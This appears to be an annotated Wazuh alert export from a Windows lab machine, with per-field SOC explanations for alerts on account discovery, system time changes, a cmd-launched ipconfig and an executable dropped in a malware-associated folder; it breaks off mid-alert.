data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:09.029+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:09.029+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533929.503964
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:36:57.1322035Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  212225
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-17 16:36:57.031 ProcessGuid: {94294ddc-2e29-6801-dd07-000000000e00} ProcessId: 14844 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:36:57.031
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-2e29-6801-dd07-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

System time changed.

🧠 What happened? System time changed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:09.365+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:09.365+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  System time changed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60132
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'time_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.gpg13:  ['1.3', '4.13']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533929.509200
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4616
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12288
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:01.6175627Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43812
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The system time was changed. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0x1c48 Name: C:\Windows\System32\svchost.exe Previous Time: ‎2025‎-‎04‎-‎24T22:32:00.197033200Z New Time: ‎2025‎-‎04‎-‎24T22:32:01.616986800Z This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-19
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.previousTime:  2025-04-24T22:32:00.1970332Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.newTime:  2025-04-24T22:32:01.6169868Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  0x1c48
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

System time changed.

🧠 What happened? System time changed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:09.396+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:09.396+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  System time changed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60132
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'time_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.gpg13:  ['1.3', '4.13']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533929.512405
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4616
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12288
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:01.6277365Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43813
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The system time was changed. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0x1c48 Name: C:\Windows\System32\svchost.exe Previous Time: ‎2025‎-‎04‎-‎24T22:32:01.625752900Z New Time: ‎2025‎-‎04‎-‎24T22:32:01.626929900Z This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-19
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.previousTime:  2025-04-24T22:32:01.6257529Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.newTime:  2025-04-24T22:32:01.6269299Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  0x1c48
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:32:10.432+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:10.432+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533930.515610
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:02.0990286Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  212287
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-17 16:37:01.957 ProcessGuid: {94294ddc-2e2d-6801-e307-000000000e00} ProcessId: 7128 Image: C:\Windows\System32\ipconfig.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: IP Configuration Utility Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: ipconfig.exe CommandLine: C:\WINDOWS\system32\ipconfig /renew CurrentDirectory: C:\Windows\System32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B ParentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} ParentProcessId: 4044 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:37:01.957
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-2e2d-6801-e307-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  7128
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  IP Configuration Utility
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\ipconfig /renew
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Windows\\System32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-2e25-6801-d807-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:32:21.166+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:21.166+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533941.521070
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:58.3562531Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  213065
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

